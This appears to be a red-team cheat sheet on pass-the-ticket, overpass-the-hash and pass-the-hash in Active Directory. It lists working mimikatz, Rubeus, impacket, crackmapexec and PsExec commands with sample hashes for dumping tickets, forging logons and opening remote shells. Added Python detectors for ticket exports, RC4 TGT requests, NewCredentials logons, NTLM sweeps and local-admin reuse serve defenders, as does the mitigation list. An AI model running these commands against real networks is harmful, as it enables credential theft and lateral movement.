PTH, PTT, Overpth, ptk

Pass-the-Ticket

Harvesting tickets from Linux

Extract ticket

mimikatz# privilege::debug
mimikatz# sekurlsa::tickets /export
# or, with Rubeus
.\Rubeus.exe dump

Inject ticket into current session

kerberos::ptt [0;304edb]-2-0-40e10000-Administrator@krbtgt-WARGREY.MON.kirbi
klist
.\PsExec.exe -accepteula \\lab-wdc01.jurassic.park cmd
.\winrs.exe -r:<any other dc> cmd.exe

Rubeus

.\Rubeus.exe ptt /ticket:[0;28419fe]-2-1-40e00000-trex@krbtgt-JURASSIC.PARK.kirbi

.\PsExec.exe -accepteula \\lab-wdc01.jurassic.park cmd

Reference: Experimenting with Kerberos Ticket Formats
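If exported .kirbi files turn up on a host during triage, their names already say what they are. The following added example (not from the original page or from mimikatz) parses the `sekurlsa::tickets /export` file-name layout, which is assumed here to be `[LUID]-group-index-flags-client@service-target.kirbi` with group 2 meaning a TGT, decodes the TicketFlags hex field into flag names and lists the forwardable TGTs with the logon session they came from; the sample file names are the two quoted on this page plus a constructed service ticket.

```python
import re
from dataclasses import dataclass

# Kerberos TicketFlags bit positions (RFC 4120), named the way mimikatz prints them.
TICKET_FLAGS = [
    (0x40000000, "forwardable"),
    (0x20000000, "forwarded"),
    (0x10000000, "proxiable"),
    (0x08000000, "proxy"),
    (0x04000000, "may_postdate"),
    (0x02000000, "postdated"),
    (0x01000000, "invalid"),
    (0x00800000, "renewable"),
    (0x00400000, "initial"),
    (0x00200000, "pre_authent"),
    (0x00100000, "hw_authent"),
    (0x00080000, "transited_policy_checked"),
    (0x00040000, "ok_as_delegate"),
    (0x00010000, "name_canonicalize"),
]

# Ticket group number in the export name (assumed from the way mimikatz labels its
# sekurlsa::tickets output): 0 = service tickets, 1 = client tickets, 2 = TGTs.
TICKET_GROUPS = {0: "TGS", 1: "client", 2: "TGT"}

# Assumed export-name layout:
#   [<logon LUID>]-<group>-<index>-<flags, 8 hex digits>-<client>@<service>-<target>.kirbi
KIRBI_NAME = re.compile(
    r"^\[(?P<luid>[0-9a-fA-F]+;[0-9a-fA-F]+)\]-(?P<group>\d)-(?P<index>\d+)-"
    r"(?P<flags>[0-9a-fA-F]{8})-(?P<client>[^@]+)@(?P<service>[^-]+)-(?P<target>.+)\.kirbi$"
)


@dataclass
class ExportedTicket:
    luid: str
    group: str
    index: int
    flags: int
    flag_names: list
    client: str
    service: str
    target: str

    @property
    def is_tgt(self) -> bool:
        return self.service.lower() == "krbtgt"


def decode_flags(flags: int) -> list:
    """Expand a TicketFlags value into its flag names, highest bit first."""
    return [name for bit, name in TICKET_FLAGS if flags & bit]


def parse_kirbi_name(name: str) -> ExportedTicket:
    """Parse one export file name; raises ValueError if it does not fit the layout."""
    m = KIRBI_NAME.match(name)
    if not m:
        raise ValueError(f"not a mimikatz export name: {name!r}")
    flags = int(m["flags"], 16)
    return ExportedTicket(
        luid=m["luid"].lower(),
        group=TICKET_GROUPS.get(int(m["group"]), f"unknown({m['group']})"),
        index=int(m["index"]),
        flags=flags,
        flag_names=decode_flags(flags),
        client=m["client"],
        service=m["service"],
        target=m["target"],
    )


def triage_kirbi_files(names) -> list:
    """Return one summary line per forwardable TGT among the given file names.

    Exported TGTs are the files that matter most in an investigation: each one lets
    its holder act as that client anywhere in the realm until it expires, so they
    are reported together with the logon session (LUID) they were taken from.
    """
    findings = []
    for name in names:
        try:
            t = parse_kirbi_name(name)
        except ValueError:
            continue  # not a ticket export, ignore
        if t.is_tgt and "forwardable" in t.flag_names:
            findings.append(
                f"TGT for {t.client}@{t.target} from logon session {t.luid} "
                f"({', '.join(t.flag_names)})"
            )
    return findings


# Constructed sample: the two names quoted on this page plus one service ticket and a stray file.
SAMPLE_FILES = [
    "[0;304edb]-2-0-40e10000-Administrator@krbtgt-WARGREY.MON.kirbi",
    "[0;28419fe]-2-1-40e00000-trex@krbtgt-JURASSIC.PARK.kirbi",
    "[0;304edb]-0-0-40a50000-Administrator@cifs-lab-wdc01.jurassic.park.kirbi",
    "notes.txt",
]

if __name__ == "__main__":
    for line in triage_kirbi_files(SAMPLE_FILES):
        print(line)
```

The flags field is the part worth reading closely: 40e10000 decodes to forwardable, renewable, initial, pre_authent and name_canonicalize, i.e. a freshly obtained TGT, whereas a service ticket such as the constructed cifs entry carries ok_as_delegate instead of initial.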


Overpass The Hash/Pass The Key (PTK)

Linux

impacket-getTGT hacktor.local/velociraptor -hashes :2a3de7fe356ee524cc9f3d579f2e0aa7

export KRB5CCNAME=/root/velociraptor.ccache
impacket-psexec hacktor.local/velociraptor@labwws02.jurassic.park -k -no-pass

Windows

.\Rubeus.exe asktgt /domain:jurassic.park /user:velociraptor /rc4:2a3de7fe356ee524cc9f3d579f2e0aa7 /ptt

.\PsExec.exe -accepteula \\labwws02.hacktor.local cmd

Obtain encryption key

mimikatz# privilege::debug
mimikatz# sekurlsa::ekeys

RC4 algorithm

sekurlsa::pth /user:Administrator /domain:pdc.wargrey.mon /rc4:96ea24eff4dff1fbe13818fbf12ea7d8 /run:powershell.exe

AES128

sekurlsa::pth /user:Administrator /domain:pdc.wargrey.mon /aes128:b65ea8151f13a31d01377f5934bf3883 /run:powershell.exe

AES256

sekurlsa::pth /user:Administrator /domain:pdc.wargrey.mon /aes256:b54259bbff03af8d37a138c375e29254a2ca0649337cc4c73addcd696b4cdb65 /run:powershell.exe
winrs.exe -r:<any other dc> cmd.exe

Using Rubeus

Rubeus.exe asktgt /user:administrator /rc4:<ntlm hash> /ptt
Rubeus.exe asktgt /user:administrator /aes256:<aes256 key> /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
Rubeus.exe ptt /ticket:<base64 ticket>
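Overpass-the-hash with an RC4 key leaves a specific trace on the domain controller: the TGT request (event 4768) is issued with encryption type 0x17, and `/run:` or `/createnetonly` produces a LogonType 9 (NewCredentials) logon on the source host. The following added example, not code from this page or from any of the tools above, runs both checks over constructed event records whose field names follow the Windows event XML (`TicketEncryptionType`, `LogonType`, `LogonProcessName`); the `legacy_accounts` baseline and the sample accounts and addresses are assumptions.

```python
# Kerberos encryption-type numbers as logged in TicketEncryptionType (RFC 3961 values).
ENCTYPES = {
    0x01: "DES-CBC-CRC", 0x03: "DES-CBC-MD5",
    0x11: "AES128-CTS-HMAC-SHA1-96", 0x12: "AES256-CTS-HMAC-SHA1-96",
    0x17: "RC4-HMAC", 0x18: "RC4-HMAC-EXP",
}
WEAK_ENCTYPES = {0x01, 0x03, 0x17, 0x18}


def account_of(ev: dict) -> str:
    """Normalise TargetUserName: 4769 logs it as user@REALM, 4768 as the bare user."""
    return ev.get("TargetUserName", "").split("@", 1)[0].lower()


def rc4_ticket_requests(events, legacy_accounts=frozenset()) -> list:
    """Flag 4768/4769 events whose ticket was issued with RC4 or DES.

    A TGT requested with only the NT hash can only be an RC4 TGT, so an RC4 4768
    for an account that normally gets AES is the lead to chase. `legacy_accounts`
    is the baseline of accounts (old appliances, accounts without AES keys) that
    legitimately still use RC4. Computer accounts are skipped to keep the noise down.
    """
    findings = []
    for ev in events:
        if ev.get("EventID") not in (4768, 4769):
            continue
        try:
            etype = int(ev.get("TicketEncryptionType", "0x0"), 16)
        except ValueError:
            continue
        acct = account_of(ev)
        if etype in WEAK_ENCTYPES and acct not in legacy_accounts and not acct.endswith("$"):
            findings.append({
                "event": ev["EventID"],
                "account": acct,
                "source": ev.get("IpAddress", "?"),
                "dc": ev.get("Computer", "?"),
                "enctype": ENCTYPES.get(etype, hex(etype)),
                "service": ev.get("ServiceName", "krbtgt"),
            })
    return findings


def newcredentials_logons(events) -> list:
    """Flag 4624 events with LogonType 9 (NewCredentials).

    A process started with alternate network credentials (sekurlsa::pth /run:,
    Rubeus /createnetonly) is recorded as a LogonType 9 logon by the seclogo logon
    process. `runas /netonly` leaves the same record, so this is a hunting lead to
    correlate with the RC4 check above, not a verdict on its own.
    """
    return [
        {"host": ev.get("Computer", "?"), "user": account_of(ev),
         "process": ev.get("LogonProcessName", "?")}
        for ev in events
        if ev.get("EventID") == 4624 and ev.get("LogonType") == "9"
    ]


# Constructed sample records (field names follow the Windows event XML EventData).
SAMPLE_EVENTS = [
    {"EventID": 4768, "Computer": "pdc.wargrey.mon", "TargetUserName": "velociraptor",
     "IpAddress": "::ffff:10.0.0.25", "TicketEncryptionType": "0x17", "PreAuthType": "2"},
    {"EventID": 4768, "Computer": "pdc.wargrey.mon", "TargetUserName": "jdoe",
     "IpAddress": "::ffff:10.0.0.31", "TicketEncryptionType": "0x12", "PreAuthType": "2"},
    {"EventID": 4768, "Computer": "pdc.wargrey.mon", "TargetUserName": "LAB-WDC01$",
     "IpAddress": "::ffff:10.0.0.5", "TicketEncryptionType": "0x12", "PreAuthType": "2"},
    {"EventID": 4769, "Computer": "pdc.wargrey.mon", "TargetUserName": "velociraptor@WARGREY.MON",
     "ServiceName": "LAB-WDC01$", "IpAddress": "::ffff:10.0.0.25", "TicketEncryptionType": "0x17"},
    {"EventID": 4769, "Computer": "pdc.wargrey.mon", "TargetUserName": "printsvc@WARGREY.MON",
     "ServiceName": "PRN01$", "IpAddress": "::ffff:10.0.0.40", "TicketEncryptionType": "0x17"},
    {"EventID": 4624, "Computer": "ws01.wargrey.mon", "TargetUserName": "bob", "LogonType": "9",
     "LogonProcessName": "seclogo", "AuthenticationPackageName": "Negotiate"},
    {"EventID": 4624, "Computer": "ws01.wargrey.mon", "TargetUserName": "bob", "LogonType": "2",
     "LogonProcessName": "User32", "AuthenticationPackageName": "Negotiate"},
]

if __name__ == "__main__":
    for f in rc4_ticket_requests(SAMPLE_EVENTS, legacy_accounts={"printsvc"}):
        print(f"[RC4] {f['event']} {f['account']} -> {f['service']} from {f['source']} ({f['enctype']})")
    for f in newcredentials_logons(SAMPLE_EVENTS):
        print(f"[LogonType 9] {f['user']} on {f['host']} via {f['process']}")
```

Read the two event IDs differently: the encryption type in a 4769 reflects the service account's keys, so RC4 there is normal for services that only have RC4 keys, while an RC4 4768 for a user whose account supports AES is the stronger signal. Enforcing AES on accounts (so that the KDC refuses RC4 TGT requests) removes the RC4 path altogether.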

Pass-the-hash

Linux

Pass The Hash using crackmapexec or NXC

Since we have the hashes, we can use them directly without cracking them. Use the following command for crackmapexec:

crackmapexec smb <targets> -u "USER NAME" -H HASH --local-auth

# example
crackmapexec smb <targets> -u "Frank Castle" -H 40739aa18503c6fcf8c7e9d434af2361 --local-auth

Running this will attempt to Pass The Hash to the machines in the network and tell which machine accepted the hash for the specified user.

Here it does not say Pwned!; instead we see a green plus sign (+), which indicates that there is a good chance the attack worked. Pwned! denotes the confirmed success of the attack.

This can further be used with psexec to gain shell access through the command:

impacket-psexec "USER NAME":@TARGET_IP -hashes FULL_NTLM_HASH

impacket-psexec "Frank Castle":@192.168.37.141 -hashes aad3b435b51404eeaad3b435b51404ee:40739aa18503c6fcf8c7e9d434af2361

This tries to find a writable share, upload a shell and execute it to get a shell. Here the user "Frank Castle" is authenticated but does not have admin access over the shares, so it fails.

Trying the same command on another machine, 192.168.1.5, gives an authentication failure.

This is because we are using local authentication: Frank Castle has access to this machine as a domain user, not as a local user. If local authentication succeeds on a Domain Controller, however, we can do much more.

Windows

Invoke-Mimikatz -command '"privilege::debug" "token::elevate" "lsadump::sam" "exit"'
Invoke-Mimikatz -command '"privilege::debug" "token::elevate" "sekurlsa::msv" "exit"'
New-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 -PropertyType DWORD
mimikatz# token::revert
mimikatz# sekurlsa::pth /user:Administrator /ntlm:a102ad5753f4c441e3af31c97fad86fd /domain:pdc /run:powershell.exe
mimikatz# sekurlsa::pth /user:Administrator /domain:us.techcorp.local /aes256:<aes256 krbtgt hash> /run:powershell.exe
SafetyKatz.exe "sekurlsa::pth /user:administrator /domain:us.techcorp.local /aes256:<aes256 krbtgt hash> /run:cmd.exe" "exit"
Rubeus.exe asktgt /user:SHALBY /rc4:5D88C6E440C1B976A9C1A2EF6AD66083 /ptt
Rubeus.exe asktgt /user:administrator /aes256:<aes256keys> /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
SafetyKatz.exe "sekurlsa::pth /user:user /domain:anything.domain.local /aes256:<> /run:cmd.exe" "exit"
winrs -r:dc whoami
winrs -r:dc cmd

PtH involves authenticating to a host directly by sending the password's NTLM hash during the authentication exchange, while OPtH is more subtle: it uses the hash or key to obtain a Kerberos ticket and then authenticates with Kerberos.
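Seen from the targets, the crackmapexec/NetExec sweep above is one source address authenticating with one account over NTLM (4624/4625 with LogonType 3) against many hosts in a short window, and `--local-auth` shows up as a TargetDomainName equal to each target's own host name instead of the domain. The following added example (not from this page or from the tools it names) implements that correlation over constructed log records; the five-minute window, the three-host threshold and the sample addresses are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta


def parse_time(ev: dict) -> datetime:
    return datetime.fromisoformat(ev["Time"])


def is_local_account(ev: dict) -> bool:
    """A local account logs on with TargetDomainName equal to the target's own host
    name rather than the AD domain, which is what --local-auth looks like."""
    host = ev.get("Computer", "").split(".", 1)[0].upper()
    return ev.get("TargetDomainName", "").upper() == host


def detect_ntlm_sweep(events, window=timedelta(minutes=5), min_hosts=3) -> list:
    """Find one source IP using one account over NTLM network logons (type 3)
    against at least `min_hosts` distinct hosts inside `window`.

    Both 4624 (success) and 4625 (failure) are aggregated, so hosts that rejected
    the hash still count toward the sweep; the successes are reported separately
    because those are the hosts the account's hash actually opened.
    """
    groups = defaultdict(list)
    for ev in events:
        if ev.get("EventID") not in (4624, 4625):
            continue
        if ev.get("LogonType") != "3" or ev.get("AuthenticationPackageName") != "NTLM":
            continue
        key = (ev.get("IpAddress", "?"), ev.get("TargetUserName", "").lower())
        groups[key].append(ev)

    findings = []
    for (src, account), evs in groups.items():
        evs.sort(key=parse_time)
        for i, first in enumerate(evs):
            in_window = [e for e in evs[i:] if parse_time(e) - parse_time(first) <= window]
            hosts = sorted({e["Computer"] for e in in_window})
            if len(hosts) >= min_hosts:
                findings.append({
                    "account": account,
                    "source": src,
                    "hosts": hosts,
                    "accepted_on": sorted({e["Computer"] for e in in_window if e["EventID"] == 4624}),
                    "local_account": all(is_local_account(e) for e in in_window),
                    "first_seen": first["Time"],
                })
                break  # one finding per (source, account) pair is enough
    return findings


def _logon(t, eid, host, user, dom, ip, pkg="NTLM", ltype="3"):
    """Build one constructed 4624/4625 record with the EventData fields used above."""
    return {"Time": t, "EventID": eid, "Computer": host, "TargetUserName": user,
            "TargetDomainName": dom, "LogonType": ltype,
            "AuthenticationPackageName": pkg, "IpAddress": ip}


# Constructed sample: one source host trying a local account against four machines in
# a few seconds, followed by ordinary single-host activity from another user.
SAMPLE_LOGONS = [
    _logon("2024-05-01T10:00:05", 4625, "ws01.lab.local", "Frank Castle", "WS01", "192.168.37.50"),
    _logon("2024-05-01T10:00:07", 4624, "ws02.lab.local", "Frank Castle", "WS02", "192.168.37.50"),
    _logon("2024-05-01T10:00:09", 4624, "ws03.lab.local", "Frank Castle", "WS03", "192.168.37.50"),
    _logon("2024-05-01T10:00:11", 4625, "fs01.lab.local", "Frank Castle", "FS01", "192.168.37.50"),
    _logon("2024-05-01T10:03:00", 4624, "fs01.lab.local", "alice", "LAB", "192.168.37.77"),
    _logon("2024-05-01T10:04:00", 4624, "ws02.lab.local", "alice", "LAB", "192.168.37.77", pkg="Kerberos"),
]

if __name__ == "__main__":
    for f in detect_ntlm_sweep(SAMPLE_LOGONS):
        kind = "local account" if f["local_account"] else "domain account"
        print(f"{f['source']} sprayed {f['account']!r} ({kind}) across {len(f['hosts'])} hosts "
              f"from {f['first_seen']}; accepted on {', '.join(f['accepted_on']) or 'none'}")
```

The `accepted_on` list is the part to act on: every host that returned 4624 for the same local account shares that account's password, which is exactly the local-admin reuse the mitigations below warn about.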

Mitigations for Pass The Hash/Password

Preventing these attacks completely is hard, but some controls can be implemented to make them difficult for attackers. The following are some suggestions for limiting Pass The Hash/Password attacks:

  • Limit account reuse

    • Do not reuse the local admin password

    • Disable Guest and Administrator accounts

    • Limit who is the local administrator

  • Use strong passwords

    • Longer passwords

    • Do not use common words

  • Privileged Access Management (PAM) limits Pass The Hash/Password attacks because the password/hash is strong and constantly rotated

    • Check out/in sensitive accounts only when needed

    • Automatically rotate passwords at each check out and check-in
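Three of the items above (no reuse of the local admin password, disabling the built-in Administrator and Guest accounts, regular rotation) can be verified from an inventory without handling any password. The added example below, not part of the original page, runs those checks over a constructed inventory in which each host's local accounts carry a credential fingerprint, an enabled flag and a last-rotation date; the row layout, the fingerprint strings (placeholders, not real hashes) and the 30-day rotation policy are assumptions.

```python
from collections import defaultdict
from datetime import date


def audit_local_admins(inventory, today, max_age_days=30) -> dict:
    """Check a host inventory against the local-account controls above.

    Each inventory row holds one host's built-in local accounts. `fingerprint` is a
    stable identifier of the stored credential: two hosts with the same fingerprint
    share the same local admin password, which is what lets one hash open all of
    them. `last_rotated` is an ISO date and `enabled` says whether the account can
    log on at all.
    """
    by_fingerprint = defaultdict(list)
    stale, enabled_builtin = [], []
    for row in inventory:
        for acct in row["accounts"]:
            name = acct["name"].lower()
            if name == "administrator":
                by_fingerprint[acct["fingerprint"]].append(row["host"])
                age = (today - date.fromisoformat(acct["last_rotated"])).days
                if age > max_age_days:
                    stale.append((row["host"], age))
            if acct["enabled"] and name in ("administrator", "guest"):
                enabled_builtin.append((row["host"], acct["name"]))
    reused = sorted(sorted(hosts) for hosts in by_fingerprint.values() if len(hosts) > 1)
    return {
        "reused_admin_password": reused,   # groups of hosts sharing one local admin credential
        "stale_rotation": stale,           # (host, days since rotation) beyond the policy
        "enabled_builtin": enabled_builtin,  # built-in accounts that should be disabled
    }


# Constructed inventory; fingerprints are placeholders, not real hashes.
SAMPLE_INVENTORY = [
    {"host": "ws01", "accounts": [
        {"name": "Administrator", "fingerprint": "fp-A", "last_rotated": "2024-04-20", "enabled": False},
        {"name": "Guest", "fingerprint": "fp-G1", "last_rotated": "2024-04-20", "enabled": False}]},
    {"host": "ws02", "accounts": [
        {"name": "Administrator", "fingerprint": "fp-A", "last_rotated": "2024-04-20", "enabled": False},
        {"name": "Guest", "fingerprint": "fp-G2", "last_rotated": "2024-04-20", "enabled": True}]},
    {"host": "ws03", "accounts": [
        {"name": "Administrator", "fingerprint": "fp-B", "last_rotated": "2024-01-10", "enabled": True},
        {"name": "Guest", "fingerprint": "fp-G3", "last_rotated": "2024-01-10", "enabled": False}]},
    {"host": "dc01", "accounts": [
        {"name": "Administrator", "fingerprint": "fp-C", "last_rotated": "2024-04-28", "enabled": False},
        {"name": "Guest", "fingerprint": "fp-G4", "last_rotated": "2024-04-28", "enabled": False}]},
]

if __name__ == "__main__":
    report = audit_local_admins(SAMPLE_INVENTORY, today=date(2024, 5, 1))
    for hosts in report["reused_admin_password"]:
        print("same local admin password on:", ", ".join(hosts))
    for host, age in report["stale_rotation"]:
        print(f"{host}: local admin password last rotated {age} days ago")
    for host, name in report["enabled_builtin"]:
        print(f"{host}: built-in account {name} is enabled")
```

Where LAPS or a PAM vault is in place, the same checks reduce to confirming that every host has a managed, unique entry and that the rotation timestamps are within policy.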

Video reference: overPassTheHash
